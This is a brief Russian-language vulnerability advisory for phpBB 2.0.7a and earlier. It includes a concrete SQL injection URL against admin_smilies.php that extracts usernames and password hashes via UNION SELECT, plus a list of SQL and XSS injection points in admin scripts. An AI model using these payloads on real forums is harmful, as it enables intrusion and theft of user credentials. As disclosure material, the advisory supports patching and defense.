Программа: phpBB 2.0.7а и более ранние версии 

Несколько уязвимостей в проверке правильности входных данных обнаружено в phpBB. Удаленный авторизованный администратор может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. 

1. SQL инъекция: 

admin_smilies.php?mode=edit&id=99 UNION SELECT 0,username,0,user_password FROM othersite_phpbb_users WHERE 
user_id=2

и еще: 

admin_smilies.php?mode=edit&id=[SQL]
admin_ smilies.php?mode=delete&id=[SQL]
admin_smilies.php?mode=edit&id=[XSS]
admin_smilies.php?mode=delete&id=[XSS]
admin_styles.php?mode=edit&style_id=[SQL]
admin_styles.ph p?mode=delete&style_id=[SQL]
admin_styles.php?mode=edit&style_id=[XSS]
admin_styles.php?mode=delete&style_id=[XSS]

Также сообщается, что множество сценариев не проверяют ID сессии. В результате удаленный пользователь может внедрить phpBB команды в тело сообщения
и они будут выполнены в браузере целевого пользователя, просматривающего сообщение форума.

Оставить мнение